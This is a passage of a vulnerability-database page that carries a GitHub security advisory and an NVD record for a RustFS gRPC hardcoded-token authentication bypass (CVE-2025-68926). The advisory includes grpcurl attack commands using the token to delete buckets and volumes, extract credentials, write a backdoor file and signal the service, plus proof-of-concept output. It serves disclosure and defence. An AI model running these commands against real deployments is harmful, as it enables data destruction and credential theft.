\\\n    -d \u0027{}\u0027 \\\n    localhost:9000 node_service.NodeService/DiskInfo\n```\n\n**Result**: \u2705 **Authenticated request accepted** (business logic error returned, not auth error)\n\n```json\n{\n  \"error\": {\n    \"code\": 36,\n    \"errorInfo\": \"io error can not find disk\"\n  }\n}\n```\n\n**Analysis**:\n- Request passed authentication (error is business logic, not authentication)\n- Proves attacker has authenticated access to sensitive system information APIs\n\n---\n\n## Impact Analysis\n\n### Affected APIs\n\nAll 50+ gRPC methods in `node_service.NodeService` are vulnerable:\n\n#### \ud83d\udd34 **CRITICAL Impact - Data Destruction**\n- `DeleteBucket` - Delete production buckets\n- `DeleteVolume` - Destroy entire storage volumes\n- `DeleteUser` - Remove legitimate users\n- `DeletePolicy` - Remove access control policies\n- `DeleteServiceAccount` - Remove service accounts\n\n#### \ud83d\udd34 **CRITICAL Impact - Configuration Manipulation**\n- `ReloadSiteReplicationConfig` - Corrupt cluster replication\n- `SignalService` - Control service lifecycle\n- `LoadPolicy` - Modify access control policies\n- `LoadPolicyMapping` - Alter policy assignments\n\n#### \ud83d\udfe0 **HIGH Impact - Unauthorized Data Access/Modification**\n- `ReadAll` / `ReadAt` - Read arbitrary data\n- `WriteAll` / `WriteStream` - Inject malicious data\n- `RenameFile` / `RenameData` - Manipulate file system\n- `UpdateMetadata` / `WriteMetadata` - Corrupt metadata\n\n#### \ud83d\udfe0 **HIGH Impact - Privilege Escalation**\n- `LoadUser` - Access user credentials\n- `LoadServiceAccount` - Access service credentials\n- `LoadGroup` - Access group memberships\n\n#### \ud83d\udfe1 **MEDIUM Impact - Information Disclosure**\n- `ServerInfo` - Server configuration disclosure\n- `DiskInfo` - Storage configuration disclosure\n- `GetMetrics` - Performance metrics disclosure\n- `GetBucketStats` - Bucket statistics disclosure\n- `LocalStorageInfo` - Storage system information\n- `ListBucket` - Bucket enumeration\n\n#### \ud83d\udfe1 **MEDIUM Impact - Cluster Operations**\n- `MakeBucket` - Unauthorized bucket creation\n- `HealBucket` - Trigger repair operations\n- `BackgroundHealStatus` - Monitor internal operations\n\n### Attack Scenarios\n\n#### Scenario 1: Data Destruction\n\n```bash\n# Enumerate all buckets\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{\"options\": \"{}\"}\u0027 \\\n  localhost:9000 node_service.NodeService/ListBucket\n\n# Delete critical production bucket\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{\"bucket\": \"production-data\"}\u0027 \\\n  localhost:9000 node_service.NodeService/DeleteBucket\n\n# Delete entire storage volume\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{\"volume\": \"vol1\"}\u0027 \\\n  localhost:9000 node_service.NodeService/DeleteVolume\n```\n\n**Impact**: Complete data loss, business disruption\n\n#### Scenario 2: Credential Harvesting\n\n```bash\n# Extract user credentials\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{\"access_key\": \"admin\"}\u0027 \\\n  localhost:9000 node_service.NodeService/LoadUser\n\n# Extract service account credentials\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{\"access_key\": \"service-account\"}\u0027 \\\n  localhost:9000 node_service.NodeService/LoadServiceAccount\n\n# Exfiltrate IAM policies\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{\"name\": \"admin-policy\"}\u0027 \\\n  localhost:9000 node_service.NodeService/LoadPolicy\n```\n\n**Impact**: Complete IAM compromise, lateral movement\n\n#### Scenario 3: Backdoor Installation\n\n```bash\n# Inject malicious data into system paths\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{\"volume\": \"config\", \"path\": \"backdoor.sh\", \"buf\": \"...\"}\u0027 \\\n  localhost:9000 node_service.NodeService/WriteAll\n\n# Modify system configuration\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{\"bucket\": \"system\", \"path\": \".rustfs.sys/config.json\", \"fi\": \"...\"}\u0027 \\\n  localhost:9000 node_service.NodeService/WriteMetadata\n```\n\n**Impact**: Persistent compromise, further exploitation\n\n#### Scenario 4: Cluster Disruption\n\n```bash\n# Corrupt replication configuration\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{}\u0027 \\\n  localhost:9000 node_service.NodeService/ReloadSiteReplicationConfig\n\n# Force service restart/shutdown\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{\"sig\": 2}\u0027 \\\n  localhost:9000 node_service.NodeService/SignalService\n```\n\n**Impact**: Distributed system failure, data inconsistency\n\n---\n\n## Exploitation Preconditions\n\n### Required Conditions\n\n\u2705 **All conditions typically met in production deployments**:\n\n1. **Network Access**: Attacker can reach gRPC port (9000/TCP)\n   - RustFS binds to `0.0.0.0` by default (all interfaces)\n   - Commonly exposed for distributed node communication\n\n2. **Token Knowledge**: Token is publicly known\n   - Available in public GitHub repository\n   - Identical across all RustFS installations\n   - Cannot be changed without code modification\n\n3. **No Additional Security Controls**:\n   - No mTLS/certificate-based authentication\n   - No IP whitelisting (typically)\n   - No VPN/network segmentation requirements\n   - No rate limiting on authentication attempts\n\n### Attack Complexity\n\n**Complexity**: \ud83d\udfe2 **TRIVIAL**\n\n- Single `grpcurl` command with hardcoded token\n- No exploit development required\n- No timing or race conditions\n- No target-specific reconnaissance needed\n- Fully automatable\n- Works against any RustFS instance\n\n**Time to Exploit**: \u003c 1 minute\n\n---\n\n## Security Impact\n\n### Confidentiality Impact: HIGH\n\n- **Complete Data Disclosure**: All stored objects readable via `ReadAll`/`ReadAt`\n- **Credential Exposure**: IAM users, service accounts, policies accessible\n- **Configuration Disclosure**: Server, storage, cluster configuration leaked\n- **Metrics Exposure**: Performance and usage metrics accessible\n\n### Integrity Impact: HIGH\n\n- **Data Modification**: Arbitrary data injection via `WriteAll`/`WriteStream`\n- **Metadata Corruption**: File metadata tampering via `WriteMetadata`\n- **Policy Manipulation**: IAM policies modifiable via `LoadPolicy`\n- **Configuration Changes**: Cluster replication config alterable\n\n### Availability Impact: HIGH\n\n- **Data Destruction**: Buckets/volumes deletable via `DeleteBucket`/`DeleteVolume`\n- **Service Disruption**: Service controllable via `SignalService`\n- **Cluster Degradation**: Replication corruption via `ReloadSiteReplicationConfig`\n- **Resource Exhaustion**: Arbitrary data writes, bucket creation\n\n---\n\n## Compliance \u0026 Regulatory Impact\n\n### Standards Violated\n\n#### PCI-DSS v4.0\n- **Requirement 6.5.3**: Broken authentication\n- **Requirement 8.2**: Strong authentication required\n- **Requirement 8.6**: Multi-factor authentication required\n\n#### OWASP Top 10 2021\n- **A07:2021 - Identification and Authentication Failures**\n  - Use of hard-coded credentials\n  - Missing or ineffective authentication\n\n#### NIST Cybersecurity Framework\n- **PR.AC-1**: Access control mechanisms violated\n- **PR.AC-7**: Authentication mechanisms insufficient\n\n#### SOC 2 Type II\n- **CC6.1**: Logical access controls inadequate\n- **CC6.6**: Credential management controls missing\n\n\n---\n\n## Proof of Concept\n\n### Automated POC Script\n\n**File**: `audit_analysis/poc_cve_2025_008_grpc_token_working.sh`\n\n**Usage**:\n```bash\nchmod +x poc_cve_2025_008_grpc_token_working.sh\n./poc_cve_2025_008_grpc_token_working.sh [target_host:port]\n```\n\n**Default Target**: `localhost:9000`\n\n### POC Output Summary\n\n```\n[PHASE 1] Baseline Testing\n  \u2713 Without token: REJECTED (Unauthenticated)\n  \u2713 With wrong token: REJECTED (Unauthenticated)\n\n[PHASE 2] Exploit\n  \u2713 With hardcoded token \"rustfs rpc\": ACCEPTED \u2705\n\n[PHASE 3] Sensitive API Access\n  \u2713 ServerInfo: SUCCESS - Configuration disclosed\n  \u2713 DiskInfo: SUCCESS - System information accessible\n\n[RESULT] VULNERABILITY CONFIRMED\n```\n\n## Acknowledgements\n\nRustFS would like to thank **bilisheep** from the **Xmirror Security Team** for discovering and responsibly reporting this vulnerability.",
  "id": "GHSA-h956-rh7x-ppgj",
  "modified": "2025-12-30T23:06:15Z",
  "published": "2025-12-30T23:06:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/rustfs/rustfs/security/advisories/GHSA-h956-rh7x-ppgj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68926"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/rustfs/rustfs"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rustfs/rustfs/releases/tag/1.0.0-alpha.77"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "RustFS has a gRPC Hardcoded Token Authentication Bypass"
}

FKIE_CVE-2025-68926

Vulnerability from fkie_nvd - Published: 2025-12-30 17:15 - Updated: 2025-12-30 17:15

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/rustfs/rustfs/security/advisories/GHSA-h956-rh7x-ppgj

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "RustFS is a distributed object storage system built in Rust. In versions prior to 1.0.0-alpha.77, RustFS implements gRPC authentication using a hardcoded static token `\"rustfs rpc\"` that is publicly exposed in the source code repository, hardcoded on both client and server sides, non-configurable with no mechanism for token rotation, and universally valid across all RustFS deployments. Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes. Version 1.0.0-alpha.77 contains a fix for the issue."
    }
  ],
  "id": "CVE-2025-68926",
  "lastModified": "2025-12-30T17:15:43.613",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-12-30T17:15:43.613",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/rustfs/rustfs/security/advisories/GHSA-h956-rh7x-ppgj"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-287"
        },
        {
          "lang": "en",
          "value": "CWE-798"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-68926 (GCVE-0-2025-68926)

GHSA-H956-RH7X-PPGJ

Vulnerability Overview

Description

Vulnerable Code Analysis

Server-Side Authentication (rustfs/src/server/http.rs:679-686)

Client-Side Authentication (crates/protos/src/lib.rs:153-174)

Service Integration (rustfs/src/server/http.rs:520-521)

Reproduction Steps

Environment Setup

Step 1: Verify Authentication is Enforced

Step 2: Extract Hardcoded Token from Source Code

Step 3: Exploit - Authenticate Using Hardcoded Token

Step 4: Demonstrate Access to Sensitive Management APIs

Impact Analysis

Affected APIs

🔴 CRITICAL Impact - Data Destruction

🔴 CRITICAL Impact - Configuration Manipulation

🟠 HIGH Impact - Unauthorized Data Access/Modification

🟠 HIGH Impact - Privilege Escalation

🟡 MEDIUM Impact - Information Disclosure

🟡 MEDIUM Impact - Cluster Operations

Attack Scenarios

Scenario 1: Data Destruction

Scenario 2: Credential Harvesting

Scenario 3: Backdoor Installation

Scenario 4: Cluster Disruption

Exploitation Preconditions

Required Conditions

Attack Complexity

Security Impact

Confidentiality Impact: HIGH

Integrity Impact: HIGH

Availability Impact: HIGH

Compliance & Regulatory Impact

Standards Violated

PCI-DSS v4.0

OWASP Top 10 2021

NIST Cybersecurity Framework

SOC 2 Type II

Proof of Concept

Automated POC Script

POC Output Summary

Acknowledgements

FKIE_CVE-2025-68926

Tags

Sightings

Nomenclature